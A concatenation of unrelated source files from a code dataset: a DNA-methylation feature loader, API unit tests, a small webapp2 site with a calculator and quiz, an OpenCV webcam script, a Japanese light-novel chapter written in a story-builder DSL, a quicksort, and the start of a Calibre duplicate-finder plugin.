open(file_path, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n labels.append(float(row[0]))\n return labels\n\n\ndef get_data_list():\n sentences = []\n tags = get_labels('5mC_features' + os.sep + 'DNA_label_train.csv')\n with open('5mC_features' + os.sep + \"DNA_train.csv\", 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n sentence = [x for x in row[0]]\n sentences.append(sentence)\n return sentences,tags\n\n\ndef read_file():\n sentences,target = get_data_list()\n feature1 = []\n feature2 = []\n feature3 = []\n for sentence in sentences:\n input = [amino[n] for n in sentence]\n feature1.append(np.eye(4)[input])\n\n with open('5mC_features'+os.sep+'NPF.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n input = [float(x) for x in row]\n feature2.append(input)\n\n with open('5mC_features'+os.sep+'One_hot.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n input = [float(x) for x in row]\n feature3.append(input)\n \n #feature1 = np.array(feature1)\n #feature2 = np.array(feature2)\n #feature3 = np.array(feature3)\n #feature2 = feature2.reshape(feature2.shape[0],41,-1)\n #feature3 = feature3.reshape(feature3.shape[0],41,-1)\n #将列表转换为tensor数据\n #feature = np.concatenate((feature3,feature2),axis=2)\n #feature = np.array(feature)\n\n feature = np.array(feature1)\n target = np.array(target)\n return feature, target\n\ndef get_data(file_name,dim1,dim2):\n _,target = get_data_list()\n feature = []\n with open('5mC_features' + os.sep + file_name+'.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n input = [float(x) for x in row]\n feature.append(input)\n feature = np.array(feature)\n feature = feature.reshape(feature.shape[0], dim1, dim2)\n target = np.array(target)\n return feature,target\n#feature,tag=read_file()\n#feature,tag = get_data('AAC',1,4)\n#print(feature.shape)\n#print(tag.shape)","sub_path":"code/get_DNA_data.py","file_name":"get_DNA_data.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"391372409","text":"# pylint: disable=missing-module-docstring, missing-function-docstring\n# pylint: disable=missing-class-docstring\n\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch, MagicMock\nfrom datetime import date\nfrom typing import List\nimport json\nfrom faker import Faker\nfrom candystore import CandyStore\n\nfrom tests.fixtures.fake_estimator import create_fake_pipeline\nfrom tests.fixtures import data_factories\nfrom augury.data_import import match_data\nfrom augury import api\nfrom augury import settings\nfrom augury.types import MLModelDict\n\n\nFAKE = Faker()\nTHIS_YEAR = date.today().year\nYEAR_RANGE = (2018, 2019)\nFAKE_ML_MODELS: List[MLModelDict] = [\n {\n \"name\": \"fake_estimator\",\n \"data_set\": \"fake_data\",\n \"prediction_type\": \"margin\",\n \"trained_to\": 2018,\n }\n]\nREQUIRED_MATCH_COLUMNS = {\n \"date\",\n \"year\",\n \"round_number\",\n \"home_team\",\n \"away_team\",\n \"venue\",\n \"home_score\",\n \"away_score\",\n \"match_id\",\n}\n\n\nclass TestApi(TestCase):\n # It doesn't matter what data Predictor returns since this method doesn't check\n @patch(\"augury.api.Predictor.make_predictions\")\n @patch(\"augury.api.settings.ML_MODELS\", FAKE_ML_MODELS)\n @patch(\"augury.api.PIPELINE_NAMES\", {\"fake_data\": \"fake\"})\n @patch(\n \"augury.settings.ProjectContext._get_pipelines\",\n MagicMock(return_value={\"fake\": create_fake_pipeline()}),\n )\n def test_make_predictions(self, mock_make_predictions):\n mock_make_predictions.return_value = CandyStore(seasons=YEAR_RANGE).fixtures()\n response = api.make_predictions(YEAR_RANGE, ml_model_names=[\"fake_estimator\"])\n\n # Check that it serializes to valid JSON due to potential issues\n # with pd.Timestamp and np.nan values\n self.assertEqual(response, json.loads(json.dumps(response)))\n\n data = response[\"data\"]\n\n self.assertIsInstance(data, list)\n self.assertIsInstance(data[0], dict)\n self.assertGreater(len(data[0].keys()), 0)\n mock_make_predictions.assert_called_with(FAKE_ML_MODELS)\n\n with self.subTest(ml_model_names=None):\n mock_make_predictions.reset_mock()\n api.make_predictions(YEAR_RANGE, ml_model_names=None)\n mock_make_predictions.assert_called_with(FAKE_ML_MODELS)\n\n def test_fetch_fixture_data(self):\n PROCESSED_FIXTURE_FIELDS = [\n \"date\",\n \"home_team\",\n \"year\",\n \"round_number\",\n \"away_team\",\n \"round_type\",\n \"venue\",\n \"match_id\",\n ]\n\n data_importer = match_data\n data_importer.fetch_fixture_data = Mock(\n return_value=CandyStore(seasons=YEAR_RANGE).fixtures()\n )\n\n response = api.fetch_fixture_data(\n f\"{YEAR_RANGE[0]}-01-01\",\n f\"{YEAR_RANGE[0]}-12-31\",\n data_import=data_importer,\n verbose=0,\n )\n\n matches = response[\"data\"]\n first_match = matches[0]\n\n self.assertEqual(set(first_match.keys()), set(PROCESSED_FIXTURE_FIELDS))\n\n fixture_years = list({match[\"year\"] for match in matches})\n self.assertEqual(fixture_years, [YEAR_RANGE[0]])\n\n def test_fetch_match_data(self):\n fake_match_results = CandyStore(seasons=YEAR_RANGE).match_results()\n data_importer = match_data\n data_importer.fetch_match_data = Mock(return_value=fake_match_results)\n\n response = api.fetch_match_data(\n f\"{YEAR_RANGE[0]}-01-01\",\n f\"{YEAR_RANGE[1]}-12-31\",\n data_import=data_importer,\n verbose=0,\n )\n\n matches = response[\"data\"]\n\n self.assertEqual(len(matches), len(fake_match_results))\n\n first_match = matches[0]\n\n self.assertEqual(\n set(first_match.keys()) & REQUIRED_MATCH_COLUMNS,\n REQUIRED_MATCH_COLUMNS,\n )\n\n match_years = list({match[\"year\"] for match in matches})\n self.assertEqual(match_years, [YEAR_RANGE[0]])\n\n def test_fetch_match_results_data(self):\n full_fake_match_results = CandyStore(seasons=1).match_results()\n round_number = FAKE.pyint(1, full_fake_match_results[\"round_number\"].max())\n fake_match_results = data_factories.fake_match_results_data(\n full_fake_match_results, round_number\n )\n\n data_importer = match_data\n data_importer.fetch_match_results_data = Mock(return_value=fake_match_results)\n\n response = api.fetch_match_results_data(\n round_number, data_import=data_importer, verbose=0\n )\n\n match_results = response[\"data\"]\n\n # It returns all available match results for the round\n self.assertEqual(\n len(match_results),\n len(fake_match_results.query(\"round == @round_number\")),\n )\n\n required_fields = set(\n [\n \"date\",\n \"year\",\n \"round_number\",\n \"home_team\",\n \"away_team\",\n \"home_score\",\n \"away_score\",\n ]\n )\n first_match = match_results[0]\n\n self.assertEqual(required_fields, set(first_match.keys()) & required_fields)\n\n match_rounds = {result[\"round_number\"] for result in match_results}\n self.assertEqual(match_rounds, set([round_number]))\n\n def test_fetch_ml_model_info(self):\n response = api.fetch_ml_model_info()\n\n models = response[\"data\"]\n\n self.assertEqual(models, settings.ML_MODELS)\n","sub_path":"src/tests/unit/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334042022","text":"#Sierre Wolfkostin\n#Templates\n\nimport webapp2\nimport os\nimport logging\nimport jinja2\n\n#set up the environment so you know where to store the files\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n#create one handler for the three main web pages\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n\n #request the path, or the page the user wants to going to\n path = self.request.path\n\n #based on the path, decide which page template to render and which information to display\n if path == \"/home\":\n temp ='templates/home.html'\n info = {\"title\": \"Home\", \"page\":\"home\"}\n elif path == \"/food\":\n temp ='templates/food.html'\n info = {\"title\": \"Food\", \"page\":\"food\"}\n elif path == \"/family\":\n temp ='templates/family.html'\n info = {\"title\": \"Family\", \"page\":\"family\"}\n else:\n temp ='templates/home.html'\n info = {\"title\": \"Home\", \"page\":\"home\"}\n\n #load the correct template based on the variable values above \n template = JINJA_ENVIRONMENT.get_template(temp)\n self.response.write(template.render(info))\n\n\nclass Calchandler(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\"}))\n\n #this is called when the user submits the form\n def post(self):\n factor = self.request.get('type')\n if factor == \"circle\":\n radius = self.request.get('radius')\n try: \n radiusint = int(radius)\n answer = 3.14159*radiusint*radiusint\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\": \"The area of a circle with radius of \" + str(radiusint) + \" is \" + str(answer)}))\n except:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\":\"Please enter a number for your radius\"}))\n\n else:\n length = self.request.get('length')\n width = self.request.get('width')\n try:\n lengthint = int(length)\n widthint = int(width)\n answer = lengthint * widthint\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\": \"The area of a square with length \" + str(lengthint) + \" and width \" + str(widthint) + \" is \" + str(answer)}))\n except:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\":\"Please enter numbers for your length and width\"})) \n\n\n#create a second handler to only handle the login and loggedin pages\nclass LoginHandler(webapp2.RequestHandler):\n #render the first template displaying the form for the user to log into\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\"}))\n\n #this is called when the user submits the form\n def post(self):\n #get the name and the password input by the user\n \n answer1 = self.request.get('like')\n answer2 = self.request.get('wish')\n answer3 = self.request.get('occupation')\n\n if answer1 != \"\" and answer2 != \"\" and answer3 != \"\":\n score = 0\n if answer1 == \"bookworm\":\n score += 1\n elif answer1 == \"socialite\":\n score += 2\n else:\n score -= 1 \n if answer2 == \"bookworm\":\n score += 1\n elif answer1 == \"socialite\":\n score += 2\n else:\n score -= 1 \n if answer3 == \"bookworm\":\n score += 1\n elif answer1 == \"socialite\":\n score += 2\n else:\n score -= 1 \n\n if score > 4:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\",\"message\": \"You are a socialite. You enjoy hanging out with friends and going to parties.\", \"title\": \"Login\", \"page\": \"activities\"}))\n elif score > 0:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\",\"message\": \"You are a bookworm. You prefer good books and quiet places.\", \"title\": \"Login\", \"page\": \"activities\"}))\n else:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\",\"message\": \"You are a sadist. You feel better when others are having a bad time. \", \"title\": \"Login\", \"page\": \"activities\"})) \n\n\n else:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"message\":\"Please fill in all bubbles to discover your personality type!\"}))\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n ('/food', MainHandler),\n ('/family', MainHandler),\n ('/home', MainHandler),\n ('/calculate', Calchandler),\n ('/login', LoginHandler)\n], debug=True)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"304575808","text":"import numpy\r\nimport cv2\r\nvid=cv2.VideoCapture(0)\r\nc=[]\r\nwhile(1):\r\n a,b=vid.read()\r\n d,c=vid.read()\r\n c[:,:,2]=255\r\n cv2.imshow('fr',b)\r\n cv2.imshow('gr',c)\r\n if cv2.waitKey(1)==27 &0xFF:\r\n break\r\nvid.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582024862","text":"# -*- coding: utf-8 -*-\n\"\"\"Story: yubijo chapter01.\n\"\"\"\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append('storybuilder')\n\nfrom storybuilder.builder import world as wd\n\n\n# episodes\ndef ep_avant(w: wd.World):\n z = w.zenzo\n lunchtime = w.day.meet.elapsed(hour=12)\n lunchafter = lunchtime.elapsed(hour=2)\n scenes = [\n w.tag.comment(\"善蔵(他)の一人称が原則\"),\n w.scene(\"男むさい職場\",\n z.feel().d(\"目の前を湯気と汗とそれからよく分からない雫が落ちていく\"),\n w.tencho.talk().t(\"何やってんだ!\",\n \"まだ餃子の皿洗えてねえのか!\"),\n z.reply().t(\"すみません!\",\n \"次で洗えます!\"),\n z.look().d(\"と返したものの\",\n \"まだ$zenzoの右手側でぐおんぐおん音を鳴らしている箱型の食洗機は赤いランプが点いたままだ。\",\n \"早く終われよこのチキショウ。\",\n \"という言葉をどこにも吐き出せないまま\",\n \"ただひたすらに目の前のシンクに溜まった泡なのか皿なのかコップなのか分からない代物へとゴム手袋の手を突っ込んでは\",\n \"灰色のプレートラックに次々と泡塗れの有象無象を並べていく\"),\n w.tencho.talk().t(\"次じゃなく今くれってんだよ!\",\n \"このドアホォが!\"),\n z.look().d(\"最近店の売上が振るわずにエリアマネージャーからどやされているらしい店長は\",\n \"ランチタイムで血圧上昇中なのか\",\n \"いつもに況して声がでかく\",\n \"言葉が乱暴だ\"),\n z.look().d(\"キッチンの喧騒に紛れてしまう小さな電子音を何とか捉えると\",\n \"$na_zenzoはレバーを持ち上げて蒸気を吹き出す食洗機から洗い終えたばかりの食器類が並ぶラックを右手側に押しやる。\",\n \"続いて既に並べ終えたもう片方のラックをセットしてレバーを下げると\",\n \"息つく暇もなく再び水と泡の大合奏が銀色の箱の中で始まる\"),\n z.talk().t(\"餃子皿です!\"),\n w.tencho.reply(\"おせーよ!\"),\n z.look().d(\"文句を言いつつも受け取ると\",\n \"焼き上がったところの餃子を盛り付けてデシャップに置いて\",\n \"すぐコンロに掛かったままの中華鍋に戻る\"),\n z.look().d(\"口は悪いが手さばきや動作の切れは幾つかアルバイトとして飲食店を渡り歩いてきた$na_zenzoから見ても\",\n \"有能な方だと思えた\"),\n z.think().d(\"それでも両隣で無言のまま調理を続ける同僚バイトたちは\",\n \"最近前髪が後退しつつある店長のことを「さっさと死ねばいい」と陰口を叩いていた\"),\n w.mikami.talk().t(\"$zenzo\", \"グラスまだ?\"),\n z.look().d(\"ホールの$mikamiだ。\",\n \"肩までの黒髪を右耳の裏側でくるりとまとめ\",\n \"彼女の意志の強さの表明であるような太眉が逆ハの字に$na_zenzoに向けられていた\"),\n z.ask().t(\"今並べますよ。\",\n \"それより今日のお客の入り具合どうです?\"),\n w.mikami.reply(\"普通じゃないかしら\"),\n z.be(w.stage.chineseshop, lunchtime),\n z.look(\"店内\").d(\"そう答えが返ってきたが\",\n \"彼女の肩越しにホールを見やると入り口の方までずらりと客が立って待っていた。\",\n \"それも何故かその半数以上が若そうな女性客ばかりだ。\",\n \"この近所で何かイベントでもあるのだろうか\"),\n z.talk().t(\"どこが普通なんですか。\",\n \"連休のランチタイムもいいとこじゃないですか\"),\n z.do().d(\"トレィに並べ終えたグラスを彼女に差し出しながらそう言うと、\"),\n w.mikami.talk().t(\"その目玉も洗った方がいいんじゃない?\"),\n z.look().d(\"何故か$na_zenzoを睨みつけてからホールに出て行ってしまった\"),\n z.talk().t(\"相変わらず冗談キツイぜ$part_mikami\"),\n z.look(\"満席\", w.i.moreusual.flag()).d(\"試しにもう一度覗いてみたが\",\n \"やはり$na_zenzoには店の壁に沿ってずらりと並ぶ大量の若い女性客が\",\n \"席が空くのを今か今かと待ち構えている様子が見えた\"),\n z.talk().t(\"やっぱ混みまくりじゃないすか\"),\n z.do(\"皿を割る\").d(\"新しく運び込まれた皿を手に取り\",\n \"シンクに向き直って放り込もうとした\",\n \"その視界が一瞬ぐらつく\"),\n w.tencho.talk().t(\"おい!\",\n \"$zenzo!\",\n \"お前またやりやがったのか!\"),\n z.hear().d(\"何のことかと思って足元を見ると\",\n \"そこには複数枚の大皿が粉々になって散らばっていた\"),\n w.tencho.talk().t(\"これで今日何枚目だと思ってんだ!\",\n \"お前はバイト代いらねえのか!\"),\n z.reply().t(\"す、すみません!\"),\n z.do(w.tencho, \"angry\").d(\"咄嗟に頭を下げたが\",\n \"そんなもので店長の怒りが収まるはずもなく\",\n \"何度も足元の「店長専用」と書かれたダンボール箱に蹴りを入れていた\"),\n ),\n w.scene(\"バイトクビだってよ\",\n z.do().d(\"何とか繁忙時間を乗り切った$heroは\",\n \"一人ロッカー室で汗をたっぷり吸ったシャツを脱ごうとしていた\"),\n z.talk(w.tencho, \"疲れてるか?\"),\n z.look().d(\"そこに店長が入ってきて\",\n \"額に張り付きそうになっていた帽子を取ると\",\n \"パイプの丸椅子を軋ませて座り\",\n \"煙草を吸い始めた\"),\n w.tencho.talk(w.i.rumor_ghostdead).t(\"お前聞いたことあるか。\",\n \"知らない奴を最近よく見るなと思ってたら\",\n \"いつの間にかそいつらが家の中まで入ってくるようになって\",\n \"ある日突然蒸発したように消えるんだそうだ\"),\n z.reply().t(\"か、怪談話すか?\"),\n z.think().d(\"$tenchoがいきなり話題を振ってくるのは\",\n \"何も珍しいことじゃなかった。\",\n \"ただやたら自分の顔を見てくるので\",\n \"そろそろ今日の小言が始まるのかと$heroは覚悟を決める\"),\n w.tencho.talk().t(\"知らない間に幽霊が見えるようになって\",\n \"そのうちに自分まで幽霊になっちまうっていうので\",\n \"世間じゃ『幽霊死』って呼ばれてるんだとさ\"),\n z.know(w.tencho, w.i.rumor_ghostdead).d(\"その現象も言葉も初耳だった\"),\n z.have(w.i.salary, w.tencho),\n w.tencho.talk().t(\"$meはさ\",\n \"これまでそういうお化けだとか妖怪だとかさ\",\n \"UFOでも何でもさ\",\n \"いる訳ねえし信じてる奴みんな馬鹿だろうって\",\n \"そう思ってたくらいなんだわ\"),\n z.reply().t(\"はあ\"),\n w.tencho.talk(w.i.allupbusiness.flag(), \"お前が来てから\").t(\"お前の所為とは思ってないんだが\",\n \"どうもお前がうちに来てからどんどん売上が落ちてるんだよな\"),\n z.think().d(\"ああ、そっちか。\",\n \"と内心では思いながらも\",\n \"$heroは黙って頷く\"),\n w.tencho.talk().t(\"別に信じてる訳じゃねえんだが\",\n \"お前さ\",\n \"ひょっとしてその幽霊なんじゃねえか?\"),\n z.reply().t(\"あの$tencho\", \"$meは\"),\n w.tencho.talk().t(\"悪いが$hata\", \"ここ辞めてくれねえかな?\"),\n z.talk(w.tencho, w.i.firejob),\n z.know(w.i.firejob),\n ),\n w.scene(\"そうだ異世界に行こう\",\n z.look().d(\"大通りを窓全開にして走り抜けて行った運送業者のトラックからは\",\n \"最近流行りらしい$natsumeの演歌が大ボリュームで漏れ響いていた\"),\n z.look(w.stage.city13).d(\"汗で背中に張り付く下着を気持ち悪いと感じつつ\",\n \"$heroは上着のボタンシャツの袖を捲る。\",\n \"右肩に引っ掛けた細身のリュックにはつい十分ほど前に渡された給料袋が差し込んであったが\",\n \"その数千円が彼の全財産と言っても良かった\"),\n w.stage.city13.explain(\"都心から離れた町\").d(\"ここ$st_city13は都心から随分と距離があるというのにも関わらず\",\n \"昼夜問わずにかなりの交通量がある。\",\n \"しかもその大半は何らかを運んでいる\",\n \"所謂トラックと呼ばれるものだ\"),\n z.go(w.stage.street).d(\"$heroは狭い歩道に佇みながら\",\n \"一冊の文庫本を\",\n \"ブックカバーも着けずに開いていた\"),\n z.look(w.truck),\n z.think(\"近所に工場が多い\"),\n z.remember(w.i.rumor_ghosthouse.flag()),\n z.go(w.stage.bookstore),\n z.have(w.GAnovel).d(\"本のタイトルは$GAtitleという\",\n \"それだけで内容を言い表しているような気がしないでもないが\",\n \"流石に長過ぎて誰も正式名称を呼ばないという\",\n \"最近ありがちな商品展開をしている作品だ\"),\n z.think().d(\"ちなみに通称は「$GAshorttitle」である\"),\n z.think().d(\"そういった小説を読むことは数少ない$heroの趣味だったが\",\n \"ただただ個人の欲望の垂れ流しを肯定するだけの内容を\",\n \"思考停止の現実逃避だと\",\n \"ネット上の知人に馬鹿にされることも多かった\"),\n z.look(w.GAnovel, w.i.beauty),\n z.think(\"付き合いたい\").d(\"それでも今$heroは純粋に思うのだ\"),\n z.think(w.i.zenzolove).t(\"美少女と付き合いたい……\"),\n z.think().d(\"そしてその為にはどうにかこうにか「異世界」というものに行かなければならない\"),\n z.remember(w.GAnovel, \"異世界もの\"),\n z.be(w.i.despair),\n z.think(w.i.suicide, \"異世界に行ける\"),\n ),\n w.scene(\"トラックバイバイ\",\n z.go(w.stage.street),\n z.look().d(\"目の前を何台もトラックが連なり\",\n \"軽快に走り抜けていく\"),\n z.do(w.i.suicide, \"$want\").d(\"痛いだろうか\"),\n z.do(w.i.hittruck, w.i.suicide).d(\"色々と迷惑が掛かるだろうか\"),\n w.truckdriver.look(w.zenzo),\n z.look().d(\"ふと視線を上げるとスマートフォンを片手に持ちながら運転席に座っている髭面の男性と\",\n \"目が合った\"),\n z.feel(\"blackout\").d(\"彼はブレーキに足を置いただろう\"),\n z.think().d(\"けれどその結果を知ることは\",\n \"$heroには叶わなかった\"),\n z.think().d(\"何故なら彼の意識はスマホの電源が切れた時のように\",\n \"一瞬でブラックアウトしてしまったからだ\"),\n ),\n ]\n return [w.chaptertitle(\"そうだ異世界に行こう\"),\n *scenes,\n ]\n\n\ndef ep_meetbijo(w: wd.World):\n z = w.zenzo\n akebi = w.akebi\n scenes = [\n w.scene(\"目覚めたら美女\",\n z.look(w.akebi, \"美女\"),\n z.look(w.stage.ghosthome, w.day.meet),\n z.meet(w.akebi),\n z.ask(akebi, \"自分はどうしてここに?\"),\n akebi.talk(w.zenzo, \"家の前で寝ていた\"),\n z.ask(w.akebi, \"彼女のこと\"),\n w.tag.comment(\"先月死ん��がそれを仄かに読み取らせる\"),\n akebi.reply(\"仕事はやめた\"),\n akebi.talk(\"大好きな人にフラレて\"),\n z.feel(\"同情\"),\n z.talk(akebi, \"励ます\"),\n akebi.reply(\"あなたみたいな人なら良かったのに\"),\n z.do(w.akebi, \"love\", \"$want\"),\n akebi.reply(w.zenzo, \"照れる\"),\n akebi.ask(\"ご飯食べます?\"),\n akebi.go(\"台所\"),\n ),\n w.scene(\"そこは幽霊屋敷\",\n z.look(\"家を見て回る\"),\n z.look(\"木造家屋\", \"二階建て\"),\n z.look(\"ベランダからの景色\", \"見覚え\"),\n z.know(\"二階\"),\n akebi.come(\"犬粥\"),\n z.ask(\"どうやって二階まで?\"),\n akebi.reply(\"普通に\"),\n akebi.do(\"鍋落とす\"),\n z.look(\"鍋浮かんでいる\"),\n akebi.talk(\"ごめんなさい\"),\n akebi.do(\"鍋\", \"浮かべて運ぶ\"),\n z.think(w.akebi, \"能力者\"),\n z.ask(w.akebi, \"能力?\"),\n akebi.reply(w.zenzo, \"no\"),\n z.look(\"美味しそうに見える粥\"),\n z.do(\"eat\"),\n akebi.talk(w.zenzo, w.i.akebi_history),\n akebi.talk(\"男運がない\"),\n z.talk(akebi, \"魅力的だ\"),\n ),\n w.scene(\"告白したら幽霊だった\",\n akebi.reply(\"まだちゃんと付き合ったことない\"),\n z.know(w.akebi, w.i.shojo),\n z.talk(w.akebi, w.i.gosteady),\n z.do(w.akebi, w.i.gosteady, \"yes\"),\n w.zenzo.think(w.akebi, w.i.nohuman.flag()),\n akebi.talk(\"実は\"),\n z.ask(akebi, w.i.akebi_reason),\n w.akebi.reply(w.zenzo, \"yes\", w.i.nohuman.deflag()),\n akebi.reply(\"死んだんです\"),\n akebi.talk(\"幽霊なんです\"),\n w.zenzo.know(w.akebi, w.i.ghost),\n z.remember(w.i.rumor_ghosthouse.deflag()),\n ),\n ]\n return [w.chaptertitle(\"美女に出会った\"),\n *scenes,\n ]\n\n\ndef ep_bijoghost(w: wd.World):\n z, akebi, murako = w.zenzo, w.akebi, w.murako\n scenes = [\n w.scene(\"幽霊が美女なら問題ない\",\n z.be(w.stage.ghosthome, w.day.meet),\n z.be(w.akebi, w.i.gosteady),\n z.ask(w.akebi, \"本当に?\"),\n akebi.reply(\"yes\"),\n z.feel(\"happy\"),\n w.zenzo.know(w.akebi, \"色々なこと\"),\n akebi.ask(z, \"幽霊でもいいの?\"),\n z.reply(\"美少女なら問題ない\"),\n akebi.feel(\"happy\"),\n w.zenzo.do(w.akebi, w.i.kiss, \"$want\"),\n z.do(\"kiss\", akebi),\n z.look(akebi, \"肌にハリが出る\", w.i.akebi_happy.flag()),\n ),\n w.scene(\"進まない時\",\n z.look(\"wake\"),\n z.look(\"clock\", \"昨日と同じ\"),\n z.ask(akebi, \"時間のこと\"),\n akebi.reply(\"わからない\"),\n z.be(\"翌日も同じ\"),\n akebi.talk(\"気にしなくていい\"),\n z.do(\"kiss\", akebi),\n z.look(\"体にカビ\"),\n z.think(\"このままだと死ぬ?\"),\n z.ask(\"外に出る\"),\n akebi.reply(\"また離れていくの?\"),\n z.go(\"夜中\"),\n z.go(\"外\"),\n z.meet(murako),\n ),\n w.scene(\"退魔師も美女\",\n murako.talk(\"退治する\"),\n murako.talk(w.i.ghostbuster, z),\n z.explain(murako, akebi),\n murako.talk(akebi, w.i.ghost),\n z.talk(akebi, \"悪い奴じゃない\"),\n murako.talk(\"幽霊は悪\"),\n murako.talk(z, \"幽霊を見られる能力がある\"),\n murako.talk(z, w.i.ghost_absorb),\n z.think(\"自分が窶れている\"),\n z.know(w.i.moreusual.deflag(), w.i.allupbusiness.deflag()),\n murako.talk(z, w.i.akebi_buster),\n w.zenzo.ask(w.akebi, w.i.ghost),\n z.ask(murako, w.i.buster_method),\n w.murako.talk(z, w.i.akebi_happy.deflag()),\n murako.reply(z, w.i.break_love),\n z.know(w.i.buster_method),\n ),\n ]\n return [w.chaptertitle(\"幽霊が美女なら問題ないよね\"),\n *scenes,\n ]\n\n\n# main\ndef story(w: wd.World):\n return (w.maintitle(\"第一話 無職が自殺しても���題ないよね?\"),\n ep_avant(w),\n ep_meetbijo(w),\n ep_bijoghost(w),\n )\n\n\ndef main(): # pragma: no cover\n import src.yubijo.story as mainstory\n w = mainstory.world()\n return w.build(story(w))\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main())\n\n","sub_path":"src/yubijo/chapter01.py","file_name":"chapter01.py","file_ext":"py","file_size_in_byte":18796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324595100","text":"class Solution:\n def qsort(self, array):\n start = 0\n end = len(array) - 1\n self.dive(array, start, end)\n return array\n\n def dive(self, array, start, end):\n index = self.divide(array, start, end)\n\n if index - start > 1:\n self.dive(array, start, index - 1)\n if end - index > 1:\n self.dive(array, index + 1, end)\n\n def divide(self, array, start, end):\n last = array[end]\n index = start\n for i in range(start, end + 1):\n if array[i] < last:\n array[index], array[i] = array[i], array[index]\n index += 1\n array[index], array[i] = array[i],array[index]\n return index\n\nprint(Solution().qsort([1, 3, 5, 67, -1, 0, 0]))","sub_path":"qsort.py","file_name":"qsort.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"53731327","text":"#!/usr/bin/env python\n# ~*~ coding: utf-8 ~*~\nfrom __future__ import (unicode_literals, division, absolute_import,\n print_function)\n\n__license__ = 'GPL v3'\n__copyright__ = '2020, Ahmed Zaki '\n__docformat__ = 'restructuredtext en'\n\n\nfrom collections import OrderedDict, defaultdict\nfrom functools import partial\nimport copy\nimport time\n\n# python3 compatibility\nfrom six import text_type as unicode\nfrom six import string_types as basestring\nfrom six.moves import range\n\nfrom calibre import prints\nfrom calibre.constants import DEBUG\nfrom calibre.ebooks.metadata.book.base import Metadata\n\nfrom calibre_plugins.find_duplicates.duplicates import DuplicateFinder, CrossLibraryDuplicateFinder\nfrom calibre_plugins.find_duplicates.book_algorithms import AlgorithmBase\nfrom calibre_plugins.find_duplicates.dialogs import SummaryMessageBox\nfrom calibre_plugins.find_duplicates.advanced.hash_functions import HashFuncs\nfrom calibre_plugins.find_duplicates.variation_algorithms import VariationAlgorithm\nfrom calibre_plugins.find_duplicates.advanced.sort import get_sort_value, sort_filters_has_templates\n\ntry:\n load_translations()\nexcept NameError:\n prints(\"FindDuplicates::advanced/__init__.py - exception when loading translations\")\n pass\n\nclass AdvancedAlgorithm(AlgorithmBase, HashFuncs):\n def __init__(self, gui, db, match_rules, exemptions_map, flags, sort_filters=[]):\n AlgorithmBase.__init__(self, gui, db, exemptions_map)\n self.match_rules = match_rules\n self.sort_filters = sort_filters or [{'field': 'authors', 'is_reversed':False},{'field': 'title', 'is_reversed':False}]\n self.flags = flags\n self.mi_cache = {}\n\n def find_candidate(self, book_id, candidates_map, include_languages=False):\n if self.flags.get('fetch_mi'):\n mi = self.db.new_api.get_proxy_metadata(book_id)\n # might need the mi object for use with sort filters later on.\n self.mi_cache[book_id] = mi\n else:\n # if no templates, get an empty mi to help performance.\n mi = Metadata(_('Unknown'))\n\n all_hashes = self.book_metadata_hash(self.db, book_id, self.match_rules, mi)\n\n for hash_ in all_hashes:\n # empty hashes are not allowed. they can match thousands of books and hog the system\n # especially in cross library compare.\n if hash_:\n candidates_map[hash_].add(book_id)\n\n def convert_candidates_to_groups(self, candidates_map):\n books_for_group_map, groups_for_book_map = AlgorithmBase.convert_candidates_to_groups(self, candidates_map)\n # Update: sort filters {\n books_for_group_map = 